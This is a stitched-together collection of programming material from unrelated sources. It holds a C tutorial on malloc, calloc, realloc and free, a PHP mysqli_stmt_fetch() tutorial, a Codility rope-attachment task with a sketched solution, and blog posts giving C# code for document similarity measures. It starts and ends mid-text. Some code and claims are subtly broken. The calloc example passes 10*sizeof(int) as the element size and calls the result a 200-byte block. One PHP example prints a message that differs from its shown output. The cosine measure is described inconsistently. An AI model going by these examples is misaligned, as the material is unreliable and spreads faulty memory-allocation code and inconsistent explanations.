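}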
Difference between calloc() and malloc() function :
Basis – malloc() – calloc()
Form of the request – malloc() takes a single total byte count and returns one block of that size. Example: int *p; p = malloc(10*sizeof(int)); ⇒ 10*2 = 20 bytes (with a 2-byte int) allocated as a single block. – calloc() takes an element count and an element size and returns a single contiguous block large enough for the whole array. Example: int *p; p = calloc(10, 10 * sizeof(int)); ⇒ one contiguous, zero-filled block of 10 * 20 = 200 bytes in total.
Initialization of allocated memory – malloc() does not initialize the allocated memory; it contains garbage values. – calloc() initializes the allocated memory to zero.
Type-casting – The cast is optional in C, since the void pointer returned converts implicitly (it is required in C++), though it is often written anyway: int *p; p = (int*)malloc(sizeof(int)*10); – Same as malloc(): int *p; p = (int*)calloc(10, 10*sizeof(int));
Number of arguments – malloc() takes a single argument (the amount of memory to allocate, in bytes). – calloc() takes 2 arguments (the number of elements and the size in bytes of a single element).
C realloc() Function :
• realloc() stands for reallocation of allocated memory.
• This function resizes a block of memory previously allocated by malloc() or calloc().
• Reallocation is useful when the previously allocated memory turns out to be larger than needed or too small.
• If, during reallocation, there is not enough room to extend the current block in place, then:
• Step 1 : a new block of the requested size is allocated,
• Step 2 : the existing data is copied to the new block, and
• Step 3 : the old block is freed.
Syntax of realloc() Function :
p = realloc(p,new_size);
Here, the block pointed to by p is reallocated to new_size bytes (a safer variant of this call is sketched just below).
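One practical detail worth a sketch (not from the original article): writing p = realloc(p, new_size) directly loses the only pointer to the old block if the call fails and returns NULL, so a temporary pointer is commonly used:
#include <stdio.h>
#include <stdlib.h>
int main()
{
    int *p = (int*)malloc(10 * sizeof(int));
    int *tmp;
    if(p == NULL)
        return 1;
    tmp = (int*)realloc(p, 20 * sizeof(int));    /* try to resize the block */
    if(tmp == NULL)
    {
        free(p);                 /* the old block is still valid, so release it */
        printf("realloc failed\n");
        return 1;
    }
    p = tmp;                     /* only overwrite p once realloc has succeeded */
    p[19] = 7;
    printf("p[19] = %d\n", p[19]);
    free(p);
    return 0;
}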
C free() Function :
• When the program no longer needs objects allocated with malloc(), calloc() or realloc(), they must be freed; otherwise the memory stays allocated (leaked) for as long as the program keeps running. The programmer releases it explicitly with the free() function.
• The free() function deallocates the memory and returns it to the system.
• Once a block has been freed its contents are no longer guaranteed, and you must not access that area again after it has been released.
Syntax of free() Function
free(p);
This statement causes the space in memory pointed to by p to be deallocated.
Example of malloc(), calloc(), realloc() and free() functions :
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main()
{
char *m,*c;
m = (char*)malloc(9*sizeof(char)); /* 9 bytes: "edugrabs" has 8 characters plus the terminating '\0' */
c = (char*)calloc(1,9*(sizeof(char)));
if(m==NULL || c==NULL )
{
printf("Couldn't able to allocate requested memory\n");
}
else
{
printf("\n malloc() initial initialization value = %d (some garbage value)", *m);
printf("\n calloc() initial initialization value = %d (always)", *c);
strcpy(m, "edugrabs");
strcpy(c, "edugrabs");
}
printf("\nContent of Dynamically allocated memory by malloc: %s",m);
printf("\nContent of Dynamically allocated memory by calloc: %s",c);
m = realloc(m,15*sizeof(char));
if(m==NULL)
{
printf("Couldn't able to reallocate requested memory\n");
}
else
{
strcpy(m,"edugrabs.com");
}
printf("\nContent of Dynamically reallocated memory by realloc: %s",m);
free(m);
free(c);
return 0;
}
Output :
malloc() initial initialization value = 42 (some garbage value)
calloc() initial initialization value = 0 (always)
Content of Dynamically allocated memory by malloc : edugrabs
Content of Dynamically allocated memory by calloc : edugrabs
Content of Dynamically allocated memory by realloc : edugrabs.com
PHP mysqli_stmt_fetch() Function
Hello folks! Welcome back to a new edition of our tutorial on PHP. In this tutorial guide, we are going to be studying the PHP mysqli_stmt_fetch() function.
The built-in PHP mysqli_stmt_fetch() function fetches the next row of results from a prepared statement into the bound variables.
Syntax
The syntax for using this function is as follows -
mysqli_stmt_fetch($stmt);
Parameter Details
1. stmt (mandatory) – an object representing a prepared statement.
Return Value
This built-in PHP function returns TRUE if data is fetched, FALSE in case of an error, and NULL if there are no more rows in the result.
PHP Version
This PHP function was first introduced in PHP version 5 and works in all the later versions.
Example1
The following is an example which demonstrates the usage of the PHP mysqli_stmt_fetch() function (in a procedural style) -
<?php
$con = mysqli_connect("localhost", "root", "password", "mydb");
mysqli_query($con, "CREATE TABLE myplayers(ID INT, First_Name VARCHAR(255), Last_Name VARCHAR(255), Place_Of_Birth VARCHAR(255), Country VARCHAR(255))");
print("Table Created.....\n");
mysqli_query($con, "INSERT INTO myplayers values(1, 'Kennedy', 'Nkpara', 'PortHarcourt', 'Nigeria')");
mysqli_query($con, "INSERT INTO myplayers values(2, 'Jonathan', 'Trott', 'CapeTown', 'SouthAfrica')");
print("Record Inserted.....\n");
//Retrieving the contents of the table
$stmt = mysqli_prepare($con, "SELECT * FROM myplayers");
//Executing the statement
mysqli_stmt_execute($stmt);
//Binding values in result to variables
mysqli_stmt_bind_result($stmt, $id, $fname, $lname, $pob, $country);
while (mysqli_stmt_fetch($stmt)) {
print("Id: ".$id."\n");
print("fname: ".$fname."\n");
print("lname: ".$lname."\n");
print("pob: ".$pob."\n");
print("country: ".$country."\n");
print("\n");
}
//Closing the statement
mysqli_stmt_close($stmt);
//Closing the connection
mysqli_close($con);
?>
Output
When the above code is executed, it will produce the following result -
Table Created.....
Record Inserted.....
Id: 1
fname: Kennedy
lname: Nkpara
pob: PortHarcourt
country: Nigeria
Id: 2
fname: Jonathan
lname: Trott
pob: CapeTown
country: SouthAfrica
Example2
In an object-oriented style the syntax of this function is $stmt->fetch(). Following is an example of this function in an object-oriented style -
<?php
//Creating a connection
$con = new mysqli("localhost", "root", "password", "mydb");
$con -> query("CREATE TABLE Test(Name VARCHAR(255), AGE INT)");
$con -> query("insert into Test values('Kennedy', 27),('Paul', 30),('Justice', 28)");
print("Table Created.....\n");
$stmt = $con -> prepare( "SELECT * FROM Test WHERE Name in(?, ?)");
$stmt -> bind_param("ss", $name1, $name2);
$name1 = 'Kennedy';
$name2 = 'Paul';
print("Records Deleted.....\n");
//Executing the statement
$stmt->execute();
//Binding variables to resultset
$stmt->bind_result($name, $age);
while ($stmt->fetch()) {
print("Name: ".$name."\n");
print("Age: ".$age."\n");
}
//Closing the statement
$stmt->close();
//Closing the connection
$con->close();
?>
Output
When the above code is executed, it will produce the following result -
Table Created.....
Records Fetched.....
Name: Kennedy
Age: 27
Name: Paul
Age: 30
Example3
Following example fetches the results of the DESCRIBE query using the built-in PHP mysqli_stmt_bind_result() and the built-in PHP mysqli_stmt_fetch() functions -
<?php
$con = mysqli_connect("localhost", "root", "password", "mydb");
mysqli_query($con, "CREATE TABLE myplayers(ID INT, First_Name VARCHAR(255), Last_Name VARCHAR(255), Place_Of_Birth VARCHAR(255), Country VARCHAR(255))");
print("Table Created.....\n");
//Description of the table
$stmt = mysqli_prepare($con, "DESC myplayers");
//Executing the statement
mysqli_stmt_execute($stmt);
//Binding values in result to variables
mysqli_stmt_bind_result($stmt, $field, $type, $null, $key, $default, $extra);
while (mysqli_stmt_fetch($stmt)) {
print("Field: ".$field."\n");
print("Type: ".$type."\n");
print("Null: ".$null."\n");
print("Key: ".$key."\n");
print("Default: ".$default."\n");
print("Extra: ".$extra."\n");
print("\n");
}
//Closing the statement
mysqli_stmt_close($stmt);
//Closing the connection
mysqli_close($con);
?>
Output
When the above code is executed, it will produce the following result -
Table Created.....
Field: ID
Type: int(11)
Null: YES
Key:
Default:
Extra:
Field: First_Name
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Field: Last_Name
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Field: Place_Of_Birth
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Field: Country
Type: varchar(255)
Null: YES
Key:
Default:
Extra:
Example4
The following example fetches the results of the SHOW TABLES query using the built-in PHP mysqli_stmt_bind_result() and mysqli_stmt_fetch() functions -
<?php
$con = mysqli_connect("localhost", "root", "password");
//Selecting the database
mysqli_query($con, "CREATE DATABASE NewDatabase");
mysqli_select_db($con, "NewDatabase");
//Creating tables
mysqli_query($con, "CREATE TABLE test1(Name VARCHAR(255), Age INT)");
mysqli_query($con, "CREATE TABLE test2(Name VARCHAR(255), Age INT)");
mysqli_query($con, "CREATE TABLE test3(Name VARCHAR(255), Age INT)");
print("Tables Created.....\n");
//Description of the table
$stmt = mysqli_prepare($con, "SHOW TABLES");
//Executing the statement
mysqli_stmt_execute($stmt);
//Binding values in result to variables
mysqli_stmt_bind_result($stmt, $table_name);
print("List of tables in the current database: \n");
while (mysqli_stmt_fetch($stmt)) {
print($table_name."\n");
}
//Closing the statement
mysqli_stmt_close($stmt);
//Closing the connection
mysqli_close($con);
?>
Output
When the above code is executed, it will produce the following result -
Tables Created.....
List of tables in the current database:
test1
test2
test3
Alright guys! This is where we are going to be rounding up this tutorial post. In our next tutorial, we are going to be discussing the PHP mysqli_stmt_field_count() Function.
Do feel free to ask your questions where necessary and we will attend to them as soon as possible. If this tutorial was helpful to you, you can use the share button to share this tutorial.
Thanks for reading and bye for now.
Tasks Details
hard
Find the maximum number of ropes that can be attached in order, without breaking any of the ropes.
Task Score
100%
Correctness
100%
Performance
100%
Task description
In a room there are N ropes and N weights. Each rope is connected to exactly one weight (at just one end), and each rope has a particular durability − the maximum weight that it can suspend.
There is also a hook, attached to the ceiling. The ropes can be attached to the hook by tying the end without the weight. The ropes can also be attached to other weights; that is, the ropes and weights can be attached to one another in a chain. A rope will break if the sum of weights connected to it, directly or indirectly, is greater than its durability.
We know the order in which we want to attach N ropes. More precisely, we know the parameters of the rope (durability and weight) and the position of each attachment. Durabilities, weights and positions are given in three arrays A, B, C of lengths N. For each I (0 ≤ I < N):
• A[I] is the durability of the I-th rope,
• B[I] is the weight connected to the I-th rope,
• C[I] (such that C[I] < I) is the position to which we attach the I-th rope; if C[I] equals −1 we attach to the hook, otherwise we attach to the weight connected to the C[I]-th rope.
The goal is to find the maximum number of ropes that can be attached in the specified order without breaking any of the ropes.
Write a function:
int solution(int A[], int B[], int C[], int N);
that, given three arrays A, B, C of N integers, returns the maximum number of ropes that can be attached in a given order.
For example, given the following arrays:
A[0] = 5    B[0] = 2    C[0] = -1
A[1] = 3    B[1] = 3    C[1] = 0
A[2] = 6    B[2] = 1    C[2] = -1
A[3] = 3    B[3] = 1    C[3] = 0
A[4] = 3    B[4] = 2    C[4] = 3
the function should return 3, as if we attach a fourth rope then one rope will break, because the sum of weights is greater than its durability (2 + 3 + 1 = 6 and 6 > 5).
Given the following arrays:
A[0] = 4    B[0] = 2    C[0] = -1
A[1] = 3    B[1] = 2    C[1] = 0
A[2] = 1    B[2] = 1    C[2] = 1
the function should return 2, as if we attach a third rope then one rope will break, because the sum of weights is greater than its durability (2 + 2 + 1 = 5 and 5 > 4).
Write an efficient algorithm for the following assumptions:
• N is an integer within the range [0..100,000];
• each element of array A is an integer within the range [1..1,000,000];
• each element of array B is an integer within the range [1..5,000];
• each element of array C is an integer such that −1 ≤ C[I] < I, for each I (0 ≤ I < N).
Copyright 2009–2019 by Codility Limited. All Rights Reserved. Unauthorized copying, publication or disclosure prohibited.
Solution
Programming language used C
Total time used 5 minutes
Effective time used 5 minutes
Notes
not defined yet
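The submitted code itself is not shown here, so purely as an illustration the sketch below (in C, the language noted above) outlines one well-known O(N log N) approach – not necessarily the solution that earned the score: binary-search the length of the attachable prefix, and test a candidate prefix by summing subtree weights in a single backwards pass (possible because C[I] < I, so every rope appears after the rope it hangs from).
#include <stdlib.h>
/* Can the first k ropes all be attached without any rope breaking? */
static int prefix_ok(int A[], int B[], int C[], int k, long long *load)
{
    int i;
    for (i = 0; i < k; i++)
        load[i] = B[i];                /* each rope carries at least its own weight */
    for (i = k - 1; i > 0; i--)        /* C[i] < i, so children are processed before parents */
        if (C[i] >= 0)
            load[C[i]] += load[i];     /* propagate the suspended weight upwards */
    for (i = 0; i < k; i++)
        if (load[i] > A[i])
            return 0;                  /* this rope would break */
    return 1;
}
int solution(int A[], int B[], int C[], int N)
{
    long long *load = malloc(sizeof(long long) * (N > 0 ? N : 1));
    int lo = 0, hi = N;                /* a valid prefix remains valid when shortened, so binary search works */
    if (load == NULL)
        return 0;
    while (lo < hi)
    {
        int mid = lo + (hi - lo + 1) / 2;
        if (prefix_ok(A, B, C, mid, load))
            lo = mid;                  /* the first mid ropes can all be attached */
        else
            hi = mid - 1;              /* some rope breaks within the first mid ropes */
    }
    free(load);
    return lo;
}
Each check is O(N) and the binary search adds a log N factor; the two worked examples above (answers 3 and 2) both agree with this sketch.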
Task timeline
Nick Grattan's Blog
About Microsoft SharePoint, .NET, Natural Language Processing and Machine Learning
Summary – Document and String Similarity/Distances Measures in C#
This post summarizes a number of recent posts on this blog showing how to calculate similarity and distance measures in C# for documents and strings.
First, documents can be represented by a “Bag of Words” (a list of the unique words in a document) or a “Frequency Distribution” (a list of the unique words in a document together with the occurrence frequency).
Bag of Words and Frequency Distributions in C#
The simplest similarity measure covered in this series is the Jaccard Similarity measure. This uses a bag of words and compares the number of common words between two documents with the overall number of words. This does not take into account the relative frequency nor the order of the words in the two documents.
Jaccard Similarity Index for measuring Document Similarity
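For reference, writing the two bags of words as sets A and B, the index is simply the ratio of shared words to all distinct words:

$$J(A,B)=\frac{\lvert A\cap B\rvert}{\lvert A\cup B\rvert}$$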
Three measures using Frequency Distributions are described. In all these cases a n-dimensional space is created from the Frequency Distribution with a dimension for each word in the documents being compared. They are:
1. Euclidean Distance – The shortest distance between two documents in the Frequency Distribution space.
2. Manhattan Distance – The sum of the absolute differences along each dimension, i.e. the side lengths of the axis-aligned hyper-rectangle formed by the two documents in the Frequency Distribution Space.
3. Cosine Distance – The cosine of the angle subtended at the origin between two documents in the Frequency Distribution Space.
These measures take into account the word frequency, but Cosine Distance cannot distinguish between documents where the relative frequency of words is the same (rather than the absolute frequency). They do not take into account the order of the words in the documents.
Euclidean, Manhattan and Cosine Distance Measures in C#
The final measure is the Levenshtein Minimum Edit Distance. This measure aligns two documents and calculates the number of inserts, deletes or substitutions that are required to change the first document into the second document, which may not necessarily be the same length. This measure takes into account the words, the frequency of words and the order of words in the document.
Levenshtein Minimum Edit Distance in C#
By using MinHash and Locality Sensitivity Hashing, similar documents can be identified very, very efficiently – these techniques are related to the Jaccard Similarity Index.
MinHash for Document Fingerprinting in C#
Locality Sensitivity Hashing for finding similar documents in C#
Written by Nick Grattan
July 10, 2014 at 6:21 pm
Levenshtein Minimum Edit Distance in C#
From Lesk[1] p.254 – “The Levenstein, or edit distance , defined between two strings of not necessarily equal length, is the minimum number of ‘edit operations’ required to change one string into the other. An edit operation is a deletion, insertion or alteration [substitution] of a single character in either sequence “. Thus the edit distance between two strings or documents takes into account not only the relative frequency of characters/words but the position as well. Strings can be aligned too. For example, here’s an alignment of two nucleotide sequences where ‘-‘ represents an insertion:
ag-tcc
cgctca
For these two strings the edit distance is 3 (2 substitutions and 1 insertion/deletion). In the case above the substitutions and inserts/deletes (“indels”) have the same weight. Often, substitutions are given a weight of 2 and indels 1 resulting in an edit distance of 5 for these strings. Substitutions are really an insert with a delete, hence the double weight.
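With these weights (insertions and deletions costing 1, substitutions costing 2 – the defaults used by the class below), the minimum edit distance D(i, j) between the first i items of one sequence and the first j items of the other satisfies the standard recurrence:

$$D(i,0)=i,\qquad D(0,j)=j,\qquad D(i,j)=\min\left\{\begin{array}{l}D(i-1,j)+1\\ D(i,j-1)+1\\ D(i-1,j-1)+\left[\,2\ \text{if}\ x_i\neq y_j,\ 0\ \text{otherwise}\,\right]\end{array}\right.$$

The bottom-right cell holds the edit distance, and following the back-trace pointers recovers an alignment.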
The edit distance is calculated using Dynamic Programming; the algorithm is well described in Jurafsky & Martin [2] p.107 and summarized in these PowerPoint slides. The following class implements the edit distance algorithm and text alignment in C#:
/// <summary>
/// Calculates the minimum edit distance (Levenshtein) between two lists of items
/// </summary>
/// <typeparam name="T">Type of item (e.g. characters or string)</typeparam>
public class MinEditDistance<T>
{
public MinEditDistance(List<T> list1, List<T> list2)
{
InsCost = 1;
DelCost = 1;
SubCost = 2;
List1 = list1;
List2 = list2;
}
List<T> List1;
List<T> List2;
Distance[,] D;
// The costs of inserts, deletes, substitutions. Normally run SubCost with 2, others at 1
public int InsCost { get; set; }
public int DelCost { get; set; }
public int SubCost { get; set; }
/// <summary>
/// Calculates the minimum edit distance using weights in InsCost etc.
/// </summary>
/// <returns></returns>
public int CalcMinEditDistance()
{
if (List1 == null || List2 == null)
{
throw new ArgumentNullException();
}
if (List1.Count == 0 || List2.Count == 0)
{
throw new ArgumentException("Zero length list");
}
// prepend dummy value
List1.Insert(0, default(T));
List2.Insert(0, default(T));
int lenList1 = List1.Count;
int lenList2 = List2.Count;
D = new Distance[lenList1, lenList2];
for (int i = 0; i < lenList1; i++)
{
D[i, 0].val = DelCost * i;
D[i, 0].backTrace = Direction.Left;
}
for (int j = 0; j < lenList2; j++)
{
D[0, j].val = InsCost * j;
D[0, j].backTrace = Direction.Up;
}
for (int i = 1; i < lenList1; i++)
for (int j = 1; j < lenList2; j++)
{
int d1 = D[i - 1, j].val + DelCost;
int d2 = D[i, j - 1].val + InsCost;
int d3 = (EqualityComparer<T>.Default.Equals(List1[i], List2[j])) ? D[i - 1, j - 1].val : D[i - 1, j - 1].val + SubCost;
D[i, j].val = Math.Min(d1, Math.Min(d2, d3));
// back trace
if (D[i, j].val == d1)
{
D[i, j].backTrace |= Direction.Left;
}
if (D[i, j].val == d2)
{
D[i, j].backTrace |= Direction.Up;
}
if (D[i, j].val == d3)
{
D[i, j].backTrace |= Direction.Diag;
}
}
return D[lenList1 - 1, lenList2 - 1].val;
}
/// <summary>
/// Returns alignment strings. The default value for T indicates an insertion or deletion in the appropriate string. align1 and align2 will
/// have the same length padded with default(T) regardless of the input string lengths.
/// </summary>
/// <param name="align1">First string alignment</param>
/// <param name="align2">Second string alignment</param>
public void Alignment(out List<T> align1, out List<T> align2)
{
if (D == null)
{
throw new Exception("Distance matrix is null");
}
int i = List1.Count - 1;
int j = List2.Count - 1;
align1 = new List<T>();
align2 = new List<T>();
while (i > 0 || j > 0)
{
Direction dir = D[i, j].backTrace;
int dVal, dDiag = int.MaxValue, dLeft = int.MaxValue, dUp = int.MaxValue;
if ((dir & Direction.Diag) == Direction.Diag)
{
// always favour diagonal as this is a match on items
dDiag = -1;
}
if ((dir & Direction.Up) == Direction.Up)
{
dUp = D[i, j - 1].val;
}
if ((dir & Direction.Left) == Direction.Left)
{
dLeft = D[i - 1, j].val;
}
dVal = Math.Min(dDiag, Math.Min(dLeft, dUp));
if (dVal == dDiag)
{
align1.Add(List1[i]);
align2.Add(List2[j]);
i--;
j--;
}
else if (dVal == dUp)
{
align1.Add(default(T));
align2.Add(List2[j]);
j--;
}
else if (dVal == dLeft)
{
align1.Add(List1[i]);
align2.Add(default(T));
i--;
}
}
align1.Reverse();
align2.Reverse();
}
/// <summary>
/// Writes out the "D" matrix showing the edit distances and the back tracing directions
/// </summary>
public void Write()
{
int lenList1 = List1.Count;
int lenList2 = List2.Count;
Console.Write(" ");
for (int i = 0; i < lenList1; i++)
{
if (i == 0)
Console.Write(string.Format("{0, 6}", "*"));
else
Console.Write(string.Format("{0, 6}", List1[i]));
}
Console.WriteLine();
for (int j = 0; j < lenList2; j++)
{
if (j == 0)
Console.Write(string.Format("{0, 6}", "*"));
else
Console.Write(string.Format("{0, 6}", List2[j]));
for (int i = 0; i < lenList1; i++)
{
Console.Write(string.Format("{0,6:###}", D[i, j].val));
}
Console.WriteLine();
Console.Write(" ");
for (int i = 0; i < lenList1; i++)
{
WriteBackTrace(D[i, j].backTrace);
}
Console.WriteLine();
Console.WriteLine();
}
}
/// <summary>
/// Writes out one backtrace item
/// </summary>
/// <param name="d"></param>
void WriteBackTrace(Direction d)
{
string s = string.Empty;
s += ((d & Direction.Diag) == Direction.Diag) ? "\u2196" : "";
s += ((d & Direction.Up) == Direction.Up) ? "\u2191" : "";
s += ((d & Direction.Left) == Direction.Left) ? "\u2190" : "";
Console.Write(string.Format("{0,6}", s));
}
/// <summary>
/// Represents one cell in the 'D' matrix
/// </summary>
public struct Distance
{
public int val;
public Direction backTrace;
}
/// <summary>
/// Direction(s) for one cell in the 'D' matrix.
/// </summary>
[FlagsAttribute]
public enum Direction
{
None = 0,
Diag = 1,
Left = 2,
Up = 4
}
}
The following code shows how this class can be used:
// example from Speech & Language Processing, Jurafsky & Martin P. 108, cites Kruskal (1983)
[TestMethod]
public void LevenshteinAltDistance()
{
string s1 = "EXECUTION";
string s2 = "INTENTION";
int m = Align(s1, s2, 2, 1, 1, "*EXECUTION", "INTE*NTION");
Assert.AreEqual(8, m);
}
private int Align(string s1, string s2, int subCost = 1, int delCost = 1, int insCost = 1, string alignment1 = null, string alignment2 = null)
{
List<char> l1 = s1.ToList();
List<char> l2 = s2.ToList();
MinEditDistance<char> med = new MinEditDistance<char>(l1, l2);
List<char> a1, a2;
med.SubCost = subCost;
med.DelCost = delCost;
med.InsCost = insCost;
int m = med.CalcMinEditDistance();
Console.WriteLine("Min edit distance: " + m);
med.Write();
med.Alignment(out a1, out a2);
foreach (char c in a1)
{
if (c == default(char))
Console.Write("*");
else
Console.Write(c);
}
Console.WriteLine();
foreach (char c in a2)
{
if (c == default(char))
Console.Write("*");
else
Console.Write(c);
}
Console.WriteLine();
if (alignment1 != null && alignment2 != null)
{
Assert.AreEqual(alignment1, new string(a1.ToArray()).Replace('\0', '*'));
Assert.AreEqual(alignment2, new string(a2.ToArray()).Replace('\0', '*'));
}
return m;
}
The output from this test reports the edit distance to be 8 and the alignment is:
*EXECUTION
INTE*NTION
The “D” matrix with backtrack information is also displayed:
[Figure: screenshot of the D matrix showing the edit distances and backtrace directions]
Note that there may be several different possible alignments since backtracking allows multiple routes through the matrix. This web site http://odur.let.rug.nl/kleiweg/lev/ provides an online tool for calculating the edit distance.
[1] “Introduction to Bioinformatics”, Arthur M. Lesk, 3rd Edition 2008, Oxford University Press
[2] “Speech and Language Processing” D.Jurafsky, J.Martin, 2nd Edition 2009, Prentice Hall
Written by Nick Grattan
June 21, 2014 at 8:10 am
Microsoft Azure to offer Machine Learning Services – Preview July 2014
“Microsoft Azure Machine Learning combines power of comprehensive machine learning with benefits of cloud”
“Machine learning today is usually self-managed and on premises, requiring the training and expertise of data scientists. However, data scientists are in short supply, commercial software licenses can be expensive and popular programming languages for statistical computing have a steep learning curve. Even if a business could overcome these hurdles, deploying new machine learning models in production systems often requires months of engineering investment. Scaling, managing and monitoring these production systems requires the capabilities of a very sophisticated engineering organization, which few enterprises have today.
Microsoft Azure Machine Learning, a fully-managed cloud service for building predictive analytics solutions, helps overcome the challenges most businesses have in deploying and using machine learning. How? By delivering a comprehensive machine learning service that has all the benefits of the cloud. In mere hours, with Azure ML, customers and partners can build data-driven applications to predict, forecast and change future outcomes – a process that previously took weeks and months.”
See this blog post from: Joseph Sirosh, Corporate Vice President of Machine Learning at Microsoft
Written by Nick Grattan
June 20, 2014 at 3:22 pm
Euclidean, Manhattan and Cosine Distance Measures in C#
Euclidean, Manhattan and Cosine Distance Measures can be used for calculating document dissimilarity. Since similarity is the inverse of a dissimilarity measure, they can also be used to calculate document similarity. For document similarity the calculations are based on Frequency Distributions. See here for a comparison between Bag of Words and Frequency Distributions and here for using Jaccard Similarity with a Bag of Words.
The calculation starts with a frequency distribution for words in a number of documents. For example:
[Figure: example frequency distribution – counts of “Cat”, “Mouse”, “Dog” and “Rat” in each document]
An n-dimensional space is then created, with a dimension for each of the words. In the above example a dimension will be created for “Cat”, “Mouse”, “Dog” and “Rat”, so it’s a four-dimensional space. Then, each document is plotted in this space. The following diagram shows the plot for just two of the four dimensions with the Euclidean Distance (the shortest distance between the two points):
[Figure: Euclidean distance between two documents in the word-frequency space]
The Manhattan distance is the sum of the side lengths of the axis-aligned rectangle formed by the two points – that is, the sum of the absolute differences along each dimension:
[Figure: Manhattan distance between two documents]
Finally, the Cosine distance is the angle subtended at the origin between the two documents. A value of 0 degrees represents identical documents and 90 degrees dissimilar documents. Note that this distance is based on the relative frequency of words in a document. A document with, say, twice as many occurrences of all words compared to another document will be regarded as identical.
[Figure: Cosine distance – the angle subtended at the origin between two documents]
For a full description of these distance measures see [1], including details on their calculation.
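In symbols, for two documents with word-frequency vectors x = (x1, ..., xn) and y = (y1, ..., yn), the three measures described above are:

$$d_{Euclidean}(x,y)=\sqrt{\sum_{i=1}^{n}(x_i-y_i)^2},\qquad d_{Manhattan}(x,y)=\sum_{i=1}^{n}\lvert x_i-y_i\rvert,\qquad \theta(x,y)=\arccos\frac{\sum_{i=1}^{n}x_i y_i}{\sqrt{\sum_{i=1}^{n}x_i^{2}}\,\sqrt{\sum_{i=1}^{n}y_i^{2}}}$$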
The Euclidean and Manhattan distances are specific examples of a more general Lr-Norm distance measure. The ‘r’ refers to a power term, and for Manhattan this is 1 and for Euclidean it’s 2. Therefore a single class can be used to implement both:
using System;
using System.Collections.Generic;

public class LrNorm
{
/// <summary>
/// Returns Euclidean distance between frequency distributions of two lists
/// </summary>
/// <typeparam name="T">Type of the item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <returns>Distance, 0 - identical</returns>
public static double Euclidean<T>(List<T> l1, List<T> l2)
{
return DoLrNorm(l1, l2, 2);
}
/// <summary>
/// Returns Manhattan distance between frequency distributions of two lists
/// </summary>
/// <typeparam name="T">Type of the item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <returns>Distance, 0 - identical</returns>
public static double Manhattan<T>(List<T> l1, List<T> l2)
{
return DoLrNorm(l1, l2, 1);
}
/// <summary>
/// Returns LrNorm distance between frequency distributions of two lists
/// </summary>
/// <typeparam name="T">Type of the item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <param name="r">Power to use 2 = Euclidean, 1 = Manhattan</param>
/// <returns>Distance, 0 - identical</returns>
public static double DoLrNorm<T>(List<T> l1, List<T> l2, int r)
{
// find distinct list of values from both lists.
List<T> dvs = FrequencyDist<T>.GetDistinctValues(l1, l2);
// create frequency distributions aligned to list of discrete values
FrequencyDist<T> fd1 = new FrequencyDist<T>(l1, dvs);
FrequencyDist<T> fd2 = new FrequencyDist<T>(l2, dvs);
if (fd1.ItemFreq.Count != fd2.ItemFreq.Count)
{
throw new Exception("Lists of different length for LrNorm calculation");
}
double sumsq = 0.0;
for (int i = 0; i < fd1.ItemFreq.Count; i++)
{
if (!EqualityComparer<T>.Default.Equals(fd1.ItemFreq.Values[i].value, fd2.ItemFreq.Values[i].value))
throw new Exception("Mismatched values in frequency distribution for LrNorm calculation");
if (r == 1) // Manhattan optimization
{
sumsq += Math.Abs((fd1.ItemFreq.Values[i].count - fd2.ItemFreq.Values[i].count));
}
else
{
sumsq += Math.Pow((double)Math.Abs((fd1.ItemFreq.Values[i].count - fd2.ItemFreq.Values[i].count)), r);
}
}
if (r == 1) // Manhattan optimization
{
return sumsq;
}
else
{
return Math.Pow(sumsq, 1.0 / r);
}
}
}
The following code shows how to use the methods in this class:
double LrNormUT(int r)
{
// Sample from Page 92 "Mining of Massive Datasets"
List<int> l1 = new List<int>();
List<int> l2 = new List<int>();
l1.Add(1);
l1.Add(1);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l1.Add(2);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(1);
l2.Add(2);
l2.Add(2);
l2.Add(2);
l2.Add(2);
return LrNorm.DoLrNorm(l1, l2, r);
}
[TestMethod]
public void Euclidean1()
{
double dist = LrNormUT(2);
Assert.AreEqual(5, (int)dist);
Console.WriteLine("d:" + dist);
}
[TestMethod]
public void Manhattan()
{
double dist = LrNormUT(1);
Assert.AreEqual(7, (int)dist);
Console.WriteLine("d:" + dist);
}
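To see where these expected values come from: over the distinct values {1, 2} the frequency vector for l1 is (2, 7) (two 1s and seven 2s) and for l2 it is (6, 4), so the Euclidean distance is √((2 − 6)² + (7 − 4)²) = √(16 + 9) = 5 and the Manhattan distance is |2 − 6| + |7 − 4| = 4 + 3 = 7.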
The following class calculates the Cosine Distance:
using System;
using System.Collections.Generic;
using System.Linq;

/// <summary>
/// Calculate cosine distance between two vectors
/// </summary>
public class Cosine
{
/// <summary>
/// Calculates the distance between frequency distributions calculated from lists of items
/// </summary>
/// <typeparam name="T">Type of the list item, e.g. int or string</typeparam>
/// <param name="l1">First list of items</param>
/// <param name="l2">Second list of items</param>
/// <returns>Distance in degrees. 90 is totally different, 0 exactly the same</returns>
public static double Distance<T>(List<T> l1, List<T> l2)
{
if (l1.Count() == 0 || l2.Count() == 0)
{
throw new Exception("Cosine Distance: lists cannot be zero length");
}
// find distinct list of items from two lists, used to align frequency distributions from two lists
List<T> dvs = FrequencyDist<T>.GetDistinctValues(l1, l2);
// calculate frequency distributions for each list.
FrequencyDist<T> fd1 = new FrequencyDist<T>(l1, dvs);
FrequencyDist<T> fd2 = new FrequencyDist<T>(l2, dvs);
if(fd1.ItemFreq.Count() != fd2.ItemFreq.Count)
{
throw new Exception("Cosine Distance: Frequency count vectors must be same length");
}
double dotProduct = 0.0;
double l2norm1 = 0.0;
double l2norm2 = 0.0;
for(int i = 0; i < fd1.ItemFreq.Values.Count(); i++)
{
if (!EqualityComparer<T>.Default.Equals(fd1.ItemFreq.Values[i].value, fd2.ItemFreq.Values[i].value))
throw new Exception("Mismatched values in frequency distribution for Cosine distance calculation");
dotProduct += fd1.ItemFreq.Values[i].count * fd2.ItemFreq.Values[i].count;
l2norm1 += fd1.ItemFreq.Values[i].count * fd1.ItemFreq.Values[i].count;
l2norm2 += fd2.ItemFreq.Values[i].count * fd2.ItemFreq.Values[i].count;
}
